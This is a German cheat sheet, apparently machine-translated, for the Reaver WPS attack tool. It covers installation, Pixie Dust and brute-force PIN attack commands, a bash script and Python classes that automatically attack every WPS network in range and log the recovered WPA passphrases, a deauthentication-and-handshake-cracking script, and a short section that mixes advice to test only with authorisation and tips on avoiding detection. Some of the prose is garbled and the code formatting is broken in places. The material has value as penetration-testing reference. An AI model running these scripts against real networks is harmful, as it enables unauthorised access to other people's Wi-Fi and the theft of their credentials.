Reaver Cheat Blatt
Überblick
Reaver ist ein spezialisiertes drahtloses Sicherheitstool, das entwickelt wurde, um Schwachstellen in Wi-Fi Protected Setup (WPS) Implementierungen zu nutzen, um WPA/WPA2 Passphrasen zurückzugewinnen. Entwickelt von Craig Heffner, Reaver implementiert einen brutalen Kraftangriff gegen WPS PIN-Authentifizierung, unter Ausnutzung eines kritischen Designfehlers im WPS-Protokoll, das Angreifern ermöglicht, die PIN in deutlich weniger Versuchen als das theoretische Maximum wiederherzustellen. Diese Schwachstelle, bekannt als WPS PIN-Angriff, betrifft Millionen von drahtlosen Routern und Access Points weltweit.
Die grundlegende Schwäche, die Reaver ausnutzt, liegt darin, wie WPS die PIN-Authentifizierung validiert. Anstatt die gesamte 8-stellige PIN als Einheit zu validieren, validiert WPS die PIN in zwei getrennten Hälften, wodurch der Suchraum von 10^8 möglichen Kombinationen auf etwa 11.000 Versuche effektiv reduziert wird. Diese Konstruktionsfehler, kombiniert mit der Tatsache, dass die meisten WPS-Implementierungen keine ordnungsgemäßen Geschwindigkeitsbegrenzungs- oder Sperrmechanismen implementieren, ermöglicht es, WPS PINs und anschließend die WPA/WPA2-Passphrase in einer Angelegenheit von Stunden wiederherzustellen.
Reaver ist zu einem unverzichtbaren Werkzeug für drahtlose Sicherheitsbewertungen und Penetrationstests geworden, das die inhärenten Sicherheitsschwächen bei WPS-Implementierungen zeigt. Die Wirksamkeit des Tools hat zu einem weit verbreiteten Bewusstsein für WPS-Schwachstellen geführt und hat viele Organisationen beeinflusst, um die WPS-Funktionalität auf ihrer drahtlosen Infrastruktur zu deaktivieren. Trotz der von einigen Herstellern durchgeführten Gegenmaßnahmen bleibt Reaver für die Prüfung von Altsystemen und die Identifizierung von gefährdeten drahtlosen Netzwerken während der Sicherheitsbewertungen von Bedeutung.
Installation
Installation des Paketmanagers
Installieren von Reaver durch Systempaketmanager:
```bash
Ubuntu/Debian installation
sudo apt update sudo apt install reaver
Kali Linux (pre-installed)
reaver --help
CentOS/RHEL installation
sudo yum install epel-release sudo yum install reaver
Arch Linux installation
sudo pacman -S reaver
Verify installation
reaver --version which reaver ```_
Quelle Compilation
Compiling Reaver aus Quellcode:
```bash
Install dependencies
sudo apt install build-essential libpcap-dev sqlite3 libsqlite3-dev
Clone repository
git clone https://github.com/t6x/reaver-wps-fork-t6x.git cd reaver-wps-fork-t6x
Navigate to source directory
cd src
Configure and compile
./configure make
Install system-wide
sudo make install
Verify installation
reaver --version ```_
Docker Installation
```bash
Create Dockerfile for Reaver
cat > Dockerfile << 'EOF' FROM kalilinux/kali-rolling RUN apt-get update && apt-get install -y reaver aircrack-ng WORKDIR /workspace CMD ["/bin/bash"] EOF
Build container
docker build -t reaver-toolkit .
Run with network access
docker run -it --net=host --privileged reaver-toolkit
Mount workspace
docker run -it --net=host --privileged -v $(pwd):/workspace reaver-toolkit ```_
Basisnutzung
Zielentdeckung
Entdecken von WPS-fähigen Access Points:
```bash
Put wireless interface in monitor mode
sudo airmon-ng start wlan0
Scan for WPS-enabled networks
wash -i wlan0mon
Detailed WPS scan
wash -i wlan0mon -C
Scan specific channel
wash -i wlan0mon -c 6
Save scan results
wash -i wlan0mon -o wps_targets.txt
Show only networks with WPS enabled
wash -i wlan0mon|grep "Yes" ```_
Grundlegende WPS Angriff
Durchführung grundlegender WPS PIN brutaler Gewaltangriff:
```bash
Basic Reaver attack
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv
Attack with specific channel
reaver -i wlan0mon -b 00:11:22:33:44:55 -c 6 -vv
Attack with delay between attempts
reaver -i wlan0mon -b 00:11:22:33:44:55 -d 1 -vv
Attack with session file
reaver -i wlan0mon -b 00:11:22:33:44:55 -s session.wpc -vv
Resume previous session
reaver -i wlan0mon -b 00:11:22:33:44:55 -s session.wpc -vv ```_
Erweiterte Angriffsoptionen
Erweiterte Reaver-Angriffskonfigurationen:
```bash
Ignore lock warnings
reaver -i wlan0mon -b 00:11:22:33:44:55 -L -vv
No NACKS (for some routers)
reaver -i wlan0mon -b 00:11:22:33:44:55 -N -vv
Disable associated requests
reaver -i wlan0mon -b 00:11:22:33:44:55 -A -vv
Use small DH keys
reaver -i wlan0mon -b 00:11:22:33:44:55 -S -vv
Specify timeout
reaver -i wlan0mon -b 00:11:22:33:44:55 -T 1 -vv ```_
Erweiterte Funktionen
PIN Management
Verwalten von WPS PIN Versuchen und Erholung:
```bash
Start from specific PIN
reaver -i wlan0mon -b 00:11:22:33:44:55 -p 12345670 -vv
Use PIN from file
reaver -i wlan0mon -b 00:11:22:33:44:55 -P pin_list.txt -vv
Generate PIN list
crunch 8 8 0123456789 > pin_list.txt
Check specific PIN
reaver -i wlan0mon -b 00:11:22:33:44:55 -p 12345670 -1 -vv
Show current PIN attempt
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv|grep "Trying pin" ```_
Sitzungsmanagement
Verwaltung von Reaver-Angriffssitzungen:
```bash
Create named session
reaver -i wlan0mon -b 00:11:22:33:44:55 -s target1.wpc -vv
List existing sessions
ls ~/.reaver/
View session details
sqlite3 ~/.reaver/target1.wpc "SELECT * FROM status;"
Delete session
rm ~/.reaver/target1.wpc
Backup session
cp ~/.reaver/target1.wpc target1_backup.wpc ```_
Grenzwerte und Timing
Steuerung des Angriffszeitpunkts und der Geschwindigkeitsbegrenzung:
```bash
Delay between PIN attempts (seconds)
reaver -i wlan0mon -b 00:11:22:33:44:55 -d 5 -vv
Delay after 10 failures
reaver -i wlan0mon -b 00:11:22:33:44:55 -r 10:60 -vv
Maximum number of attempts
reaver -i wlan0mon -b 00:11:22:33:44:55 -g 100 -vv
Timeout for each attempt
reaver -i wlan0mon -b 00:11:22:33:44:55 -T 5 -vv
Recurring delay pattern
reaver -i wlan0mon -b 00:11:22:33:44:55 -R 3 -vv ```_
Pixie Dust Attack
Durchführung Pixie Dust (offline) Angriff:
```bash
Enable Pixie Dust attack
reaver -i wlan0mon -b 00:11:22:33:44:55 -K -vv
Pixie Dust with specific parameters
reaver -i wlan0mon -b 00:11:22:33:44:55 -K 1 -vv
Save Pixie Dust data
reaver -i wlan0mon -b 00:11:22:33:44:55 -K -O pixie_data.txt -vv
Use external Pixie Dust tool
pixiewps -e pke -r pkr -s hash1 -z hash2 -a authkey -n e-nonce
Automated Pixie Dust with OneShot
python3 oneshot.py -i wlan0mon -b 00:11:22:33:44:55 -K ```_
Automatisierungsskripte
Maß WPS Testing
```bash
!/bin/bash
Mass WPS testing script
INTERFACE="wlan0mon" RESULTS_DIR="reaver_results" DELAY=2
mkdir -p $RESULTS_DIR
echo "Starting mass WPS testing"
Discover WPS targets
echo "Discovering WPS-enabled targets..." wash -i $INTERFACE -C > $RESULTS_DIR/wps_targets.txt
Extract target information
grep "Yes" $RESULTS_DIR/wps_targets.txt|while read line; do BSSID=$(echo $line|awk '\\{print $1\\}') CHANNEL=$(echo $line|awk '\\{print $2\\}') ESSID=$(echo $line|awk '\\{print $6\\}')
echo "Testing target: $ESSID ($BSSID) on channel $CHANNEL"
# Create target-specific log
LOG_FILE="$RESULTS_DIR/reaver_$\\\\{BSSID//:/_\\\\}.log"
SESSION_FILE="$RESULTS_DIR/session_$\\\\{BSSID//:/_\\\\}.wpc"
# Try Pixie Dust attack first
echo "Attempting Pixie Dust attack on $BSSID"
timeout 300 reaver -i $INTERFACE -b $BSSID -c $CHANNEL -K -vv -s $SESSION_FILE > $LOG_FILE 2>&1
# Check if Pixie Dust was successful
if grep -q "WPS PIN:" $LOG_FILE; then
echo "SUCCESS: Pixie Dust attack successful for $BSSID"
grep "WPS PIN:\|WPA PSK:" $LOG_FILE >> $RESULTS_DIR/successful_attacks.txt
continue
fi
# If Pixie Dust failed, try regular brute force
echo "Pixie Dust failed, attempting brute force on $BSSID"
timeout 3600 reaver -i $INTERFACE -b $BSSID -c $CHANNEL -d $DELAY -vv -s $SESSION_FILE >> $LOG_FILE 2>&1 &
# Store PID for later management
echo $! > $RESULTS_DIR/reaver_$\\\\{BSSID//:/_\\\\}.pid
sleep 10 # Brief delay between targets
done
echo "Mass WPS testing initiated. Check $RESULTS_DIR for results." ```_
Automatisierte PIN Erholung
```python
!/usr/bin/env python3
Automated WPS PIN recovery script
import subprocess import re import time import json from datetime import datetime
class ReaverAutomation: def init(self, interface): self.interface = interface self.results = \\{\\} self.active_attacks = \\{\\}
def discover_targets(self):
"""Discover WPS-enabled targets"""
cmd = ["wash", "-i", self.interface, "-C"]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
targets = []
for line in result.stdout.split('\n'):
if 'Yes' in line: # WPS enabled
parts = line.split()
if len(parts) >= 6:
target = \\\\{
'bssid': parts[0],
'channel': parts[1],
'rssi': parts[2],
'wps_version': parts[3],
'wps_locked': parts[4],
'essid': ' '.join(parts[5:])
\\\\}
targets.append(target)
return targets
except Exception as e:
print(f"Error discovering targets: \\\\{e\\\\}")
return []
def pixie_dust_attack(self, target):
"""Attempt Pixie Dust attack"""
cmd = [
"reaver",
"-i", self.interface,
"-b", target['bssid'],
"-c", target['channel'],
"-K", # Pixie Dust
"-vv"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
# Parse output for PIN and PSK
pin_match = re.search(r'WPS PIN: (\d+)', result.stdout)
psk_match = re.search(r'WPA PSK: (.+)', result.stdout)
if pin_match and psk_match:
return \\\\{
'success': True,
'method': 'pixie_dust',
'pin': pin_match.group(1),
'psk': psk_match.group(1),
'time': datetime.now().isoformat()
\\\\}
else:
return \\\\{'success': False, 'method': 'pixie_dust'\\\\}
except subprocess.TimeoutExpired:
return \\\\{'success': False, 'method': 'pixie_dust', 'error': 'timeout'\\\\}
except Exception as e:
return \\\\{'success': False, 'method': 'pixie_dust', 'error': str(e)\\\\}
def brute_force_attack(self, target, max_time=3600):
"""Attempt brute force attack"""
session_file = f"session_\\\\{target['bssid'].replace(':', '_')\\\\}.wpc"
cmd = [
"reaver",
"-i", self.interface,
"-b", target['bssid'],
"-c", target['channel'],
"-d", "2", # 2 second delay
"-s", session_file,
"-vv"
]
try:
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True)
start_time = time.time()
while True:
if time.time() - start_time > max_time:
process.terminate()
return \\\\{'success': False, 'method': 'brute_force', 'error': 'timeout'\\\\}
line = process.stdout.readline()
if not line:
break
# Check for successful PIN recovery
pin_match = re.search(r'WPS PIN: (\d+)', line)
psk_match = re.search(r'WPA PSK: (.+)', line)
if pin_match and psk_match:
process.terminate()
return \\\\{
'success': True,
'method': 'brute_force',
'pin': pin_match.group(1),
'psk': psk_match.group(1),
'time': datetime.now().isoformat()
\\\\}
# Check for rate limiting
if 'rate limiting' in line.lower():
print(f"Rate limiting detected for \\\\{target['bssid']\\\\}")
time.sleep(60) # Wait before continuing
process.terminate()
return \\\\{'success': False, 'method': 'brute_force'\\\\}
except Exception as e:
return \\\\{'success': False, 'method': 'brute_force', 'error': str(e)\\\\}
def attack_target(self, target):
"""Attack single target with multiple methods"""
print(f"Attacking \\\\{target['essid']\\\\} (\\\\{target['bssid']\\\\})")
# Try Pixie Dust first
result = self.pixie_dust_attack(target)
if result['success']:
print(f"SUCCESS: Pixie Dust attack successful for \\\\{target['bssid']\\\\}")
self.results[target['bssid']] = result
return result
# If Pixie Dust failed, try brute force
print(f"Pixie Dust failed, attempting brute force for \\\\{target['bssid']\\\\}")
result = self.brute_force_attack(target)
if result['success']:
print(f"SUCCESS: Brute force attack successful for \\\\{target['bssid']\\\\}")
else:
print(f"FAILED: All attacks failed for \\\\{target['bssid']\\\\}")
self.results[target['bssid']] = result
return result
def run_mass_attack(self):
"""Run attacks against all discovered targets"""
targets = self.discover_targets()
if not targets:
print("No WPS-enabled targets found")
return
print(f"Found \\\\{len(targets)\\\\} WPS-enabled targets")
for target in targets:
self.attack_target(target)
time.sleep(5) # Brief delay between targets
self.generate_report()
def generate_report(self):
"""Generate attack results report"""
report = \\\\{
'timestamp': datetime.now().isoformat(),
'interface': self.interface,
'total_targets': len(self.results),
'successful_attacks': len([r for r in self.results.values() if r['success']]),
'results': self.results
\\\\}
with open('reaver_report.json', 'w') as f:
json.dump(report, f, indent=2)
print(f"Report saved to reaver_report.json")
print(f"Successful attacks: \\\\{report['successful_attacks']\\\\}/\\\\{report['total_targets']\\\\}")
Usage
if name == "main": automation = ReaverAutomation("wlan0mon") automation.run_mass_attack() ```_
WPS Vulnerability Scanner
```python
!/usr/bin/env python3
WPS vulnerability scanner
import subprocess import re import csv from datetime import datetime
class WPSScanner: def init(self, interface): self.interface = interface self.vulnerabilities = []
def scan_wps_networks(self):
"""Scan for WPS-enabled networks"""
cmd = ["wash", "-i", self.interface, "-C"]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
networks = []
for line in result.stdout.split('\n'):
if line.strip() and not line.startswith('BSSID'):
parts = line.split()
if len(parts) >= 5:
network = \\\\{
'bssid': parts[0],
'channel': parts[1],
'rssi': parts[2],
'wps_version': parts[3],
'wps_locked': parts[4],
'wps_enabled': 'Yes' in line,
'essid': ' '.join(parts[5:]) if len(parts) > 5 else 'Hidden'
\\\\}
networks.append(network)
return networks
except Exception as e:
print(f"Error scanning networks: \\\\{e\\\\}")
return []
def test_pixie_dust_vulnerability(self, network):
"""Test if network is vulnerable to Pixie Dust attack"""
cmd = [
"reaver",
"-i", self.interface,
"-b", network['bssid'],
"-c", network['channel'],
"-K", # Pixie Dust
"-vv"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
# Check for Pixie Dust vulnerability indicators
if 'WPS PIN:' in result.stdout:
return 'vulnerable'
elif 'Pixie Dust attack failed' in result.stdout:
return 'not_vulnerable'
elif 'timeout' in result.stderr.lower():
return 'timeout'
else:
return 'unknown'
except subprocess.TimeoutExpired:
return 'timeout'
except Exception as e:
return 'error'
def assess_wps_security(self, network):
"""Assess WPS security configuration"""
vulnerabilities = []
# Check if WPS is enabled
if network['wps_enabled']:
vulnerabilities.append('WPS_ENABLED')
# Check if WPS is locked
if network['wps_locked'] == 'No':
vulnerabilities.append('WPS_NOT_LOCKED')
# Check WPS version
if network['wps_version'] in ['1.0', '2.0']:
vulnerabilities.append('VULNERABLE_WPS_VERSION')
# Test Pixie Dust vulnerability
pixie_result = self.test_pixie_dust_vulnerability(network)
if pixie_result == 'vulnerable':
vulnerabilities.append('PIXIE_DUST_VULNERABLE')
return vulnerabilities
def generate_vulnerability_report(self, networks):
"""Generate comprehensive vulnerability report"""
report_data = []
for network in networks:
if network['wps_enabled']:
vulns = self.assess_wps_security(network)
report_entry = \\\\{
'timestamp': datetime.now().isoformat(),
'bssid': network['bssid'],
'essid': network['essid'],
'channel': network['channel'],
'rssi': network['rssi'],
'wps_version': network['wps_version'],
'wps_locked': network['wps_locked'],
'vulnerabilities': ','.join(vulns),
'risk_level': self.calculate_risk_level(vulns)
\\\\}
report_data.append(report_entry)
self.vulnerabilities.extend(vulns)
# Save to CSV
with open('wps_vulnerability_report.csv', 'w', newline='') as csvfile:
fieldnames = ['timestamp', 'bssid', 'essid', 'channel', 'rssi',
'wps_version', 'wps_locked', 'vulnerabilities', 'risk_level']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for entry in report_data:
writer.writerow(entry)
return report_data
def calculate_risk_level(self, vulnerabilities):
"""Calculate risk level based on vulnerabilities"""
if 'PIXIE_DUST_VULNERABLE' in vulnerabilities:
return 'CRITICAL'
elif 'WPS_NOT_LOCKED' in vulnerabilities and 'WPS_ENABLED' in vulnerabilities:
return 'HIGH'
elif 'WPS_ENABLED' in vulnerabilities:
return 'MEDIUM'
else:
return 'LOW'
def run_assessment(self):
"""Run complete WPS security assessment"""
print("Starting WPS vulnerability assessment...")
networks = self.scan_wps_networks()
print(f"Found \\\\{len(networks)\\\\} networks")
wps_networks = [n for n in networks if n['wps_enabled']]
print(f"Found \\\\{len(wps_networks)\\\\} WPS-enabled networks")
if wps_networks:
report = self.generate_vulnerability_report(wps_networks)
# Summary statistics
critical = len([r for r in report if r['risk_level'] == 'CRITICAL'])
high = len([r for r in report if r['risk_level'] == 'HIGH'])
medium = len([r for r in report if r['risk_level'] == 'MEDIUM'])
print(f"\nVulnerability Summary:")
print(f"Critical: \\\\{critical\\\\}")
print(f"High: \\\\{high\\\\}")
print(f"Medium: \\\\{medium\\\\}")
print(f"Report saved to wps_vulnerability_report.csv")
else:
print("No WPS-enabled networks found")
Usage
if name == "main": scanner = WPSScanner("wlan0mon") scanner.run_assessment() ```_
Integrationsbeispiele
Integration von Aircracks
```bash
!/bin/bash
Reaver and Aircrack-ng integration
INTERFACE="wlan0mon" TARGET_BSSID="00:11:22:33:44:55" TARGET_CHANNEL="6"
echo "Starting integrated WPS/WPA attack"
Start airodump-ng to capture handshakes
airodump-ng -c $TARGET_CHANNEL -w capture --bssid $TARGET_BSSID $INTERFACE & AIRODUMP_PID=$!
Start Reaver attack
reaver -i $INTERFACE -b $TARGET_BSSID -c $TARGET_CHANNEL -vv & REAVER_PID=$!
Monitor for successful WPS crack
while kill -0 $REAVER_PID 2>/dev/null; do if grep -q "WPS PIN:" reaver.log 2>/dev/null; then echo "WPS PIN recovered!" kill $REAVER_PID break fi sleep 10 done
If WPS failed, try WPA handshake capture
if ! grep -q "WPS PIN:" reaver.log 2>/dev/null; then echo "WPS attack failed, attempting handshake capture"
# Send deauth packets to force handshake
aireplay-ng -0 5 -a $TARGET_BSSID $INTERFACE
# Wait for handshake
sleep 30
# Stop airodump-ng
kill $AIRODUMP_PID
# Check for captured handshake
if aircrack-ng -w wordlist.txt capture-01.cap; then
echo "WPA passphrase recovered via handshake attack"
fi
fi
echo "Attack completed" ```_
Kismet Integration
```python
!/usr/bin/env python3
Reaver and Kismet integration
import subprocess import json import time
class ReaverKismetIntegration: def init(self, kismet_server="localhost:2501"): self.kismet_server = kismet_server self.wps_targets = []
def get_kismet_devices(self):
"""Get device list from Kismet"""
cmd = [
"curl",
"-s",
f"http://\\\\{self.kismet_server\\\\}/devices/views/all/devices.json"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True)
devices = json.loads(result.stdout)
wps_devices = []
for device in devices:
if 'dot11.device' in device:
dot11 = device['dot11.device']
if 'dot11.device.wps_config_methods' in dot11:
wps_devices.append(\\\\{
'bssid': device['kismet.device.base.macaddr'],
'ssid': dot11.get('dot11.device.last_beaconed_ssid', 'Hidden'),
'channel': dot11.get('dot11.device.channel', 'Unknown'),
'signal': device.get('kismet.device.base.signal', \\\\{\\\\}).get('kismet.common.signal.last_signal', 0)
\\\\})
return wps_devices
except Exception as e:
print(f"Error getting Kismet devices: \\\\{e\\\\}")
return []
def prioritize_targets(self, devices):
"""Prioritize targets based on signal strength and other factors"""
# Sort by signal strength (higher is better)
sorted_devices = sorted(devices, key=lambda x: x['signal'], reverse=True)
# Filter out weak signals
strong_devices = [d for d in sorted_devices if d['signal'] > -70]
return strong_devices
def attack_target(self, target, interface="wlan0mon"):
"""Attack target with Reaver"""
cmd = [
"reaver",
"-i", interface,
"-b", target['bssid'],
"-c", str(target['channel']),
"-K", # Try Pixie Dust first
"-vv"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
if 'WPS PIN:' in result.stdout:
return \\\\{
'success': True,
'method': 'pixie_dust',
'output': result.stdout
\\\\}
else:
# Try brute force if Pixie Dust fails
cmd[cmd.index('-K')] = '-d'
cmd.insert(cmd.index('-d') + 1, '2')
result = subprocess.run(cmd, capture_output=True, text=True, timeout=1800)
if 'WPS PIN:' in result.stdout:
return \\\\{
'success': True,
'method': 'brute_force',
'output': result.stdout
\\\\}
else:
return \\\\{'success': False, 'output': result.stdout\\\\}
except subprocess.TimeoutExpired:
return \\\\{'success': False, 'error': 'timeout'\\\\}
except Exception as e:
return \\\\{'success': False, 'error': str(e)\\\\}
def run_integrated_attack(self, interface="wlan0mon"):
"""Run integrated Kismet + Reaver attack"""
print("Getting WPS targets from Kismet...")
devices = self.get_kismet_devices()
if not devices:
print("No WPS devices found in Kismet")
return
print(f"Found \\\\{len(devices)\\\\} WPS-enabled devices")
# Prioritize targets
targets = self.prioritize_targets(devices)
print(f"Attacking \\\\{len(targets)\\\\} prioritized targets")
for target in targets:
print(f"Attacking \\\\{target['ssid']\\\\} (\\\\{target['bssid']\\\\})")
result = self.attack_target(target, interface)
if result['success']:
print(f"SUCCESS: \\\\{target['ssid']\\\\} cracked via \\\\{result['method']\\\\}")
# Log successful attack
with open('successful_attacks.log', 'a') as f:
f.write(f"\\\\{time.ctime()\\\\}: \\\\{target['ssid']\\\\} (\\\\{target['bssid']\\\\}) - \\\\{result['method']\\\\}\n")
else:
print(f"FAILED: \\\\{target['ssid']\\\\} attack unsuccessful")
time.sleep(5) # Brief delay between attacks
Usage
if name == "main": integration = ReaverKismetIntegration() integration.run_integrated_attack("wlan0mon") ```_
Fehlerbehebung
Gemeinsame Themen
Interface Probleme: ```bash
Check wireless interface
iwconfig
Put interface in monitor mode
sudo airmon-ng start wlan0
Check monitor mode interface
iwconfig wlan0mon
Kill conflicting processes
sudo airmon-ng check kill
Restart network manager
sudo systemctl restart NetworkManager ```_
WPS Lock Issues: ```bash
Check if WPS is locked
wash -i wlan0mon|grep "Yes.*Yes"
Wait for lock timeout
reaver -i wlan0mon -b 00:11:22:33:44:55 -L -vv
Use longer delays
reaver -i wlan0mon -b 00:11:22:33:44:55 -d 60 -vv
Try different attack methods
reaver -i wlan0mon -b 00:11:22:33:44:55 -N -A -vv ```_
Verbandsprobleme: ```bash
Check signal strength
wash -i wlan0mon|grep BSSID
Move closer to target
Increase transmission power (if legal)
sudo iwconfig wlan0mon txpower 20
Use external antenna
Check for interference
airodump-ng wlan0mon ```_
Debugging
Debugging und Protokollierung aktivieren:
```bash
Maximum verbosity
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv
Log to file
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv 2>&1|tee reaver.log
Monitor system logs
tail -f /var/log/syslog|grep reaver
Check wireless driver logs
dmesg|grep -i wireless
Monitor network traffic
tcpdump -i wlan0mon -w reaver_traffic.pcap ```_
Sicherheitsüberlegungen
Rechtliche und ethische Überlegungen
Authorized Testing Only: - Nur Testnetzwerke, die Sie besitzen oder eine ausdrückliche Erlaubnis zum Testen haben - schriftliche Genehmigung vor der Durchführung von WPS-Angriffen erhalten - Folgen Sie den lokalen Gesetzen und Vorschriften zur drahtlosen Sicherheitsprüfung - Respektieren Sie Privatsphäre und Vertraulichkeit des Netzwerkverkehrs - Dokumentation aller Prüftätigkeiten für die Einhaltung
**Verantwortliche Angaben: ** - Melden Sie Schwachstellen an Netzbetreibern - Bereitstellung von Abhilfeberatung - Erlauben Sie angemessene Zeit für Fixes - koordinierte Offenlegungsverfahren - Vertraulichkeit während des Offenlegungsprozesses
Operationelle Sicherheit
** Nachweisvermeidung:** - Verwenden Sie geeignete Verzögerungen zwischen Versuchen - Monitor für defensive Antworten - Vermeiden Sie Spitzenzeiten - Verwenden Sie Richtantennen, wenn möglich - Durchführung richtiger operativer Sicherheitsmaßnahmen
** Auswirkungen auf das Netz:** - Minimieren Sie die Störung der legitimen Nutzer - Vermeiden Sie übermäßige Deauthentikalangriffe - Überwachen Sie die Auswirkungen der Netzwerkleistung - geeignete Leistungsstufen verwenden - Anforderungen an die Netzverfügbarkeit
Referenzen
- Reaver GitHub Repository
- [WPS Protokoll Spezifikation](https://__LINK_5___
- [WPS Sicherheitslücken](LINK_5
- (LINK_5)
- [IEEE 802.11 Standards](__LINK_5___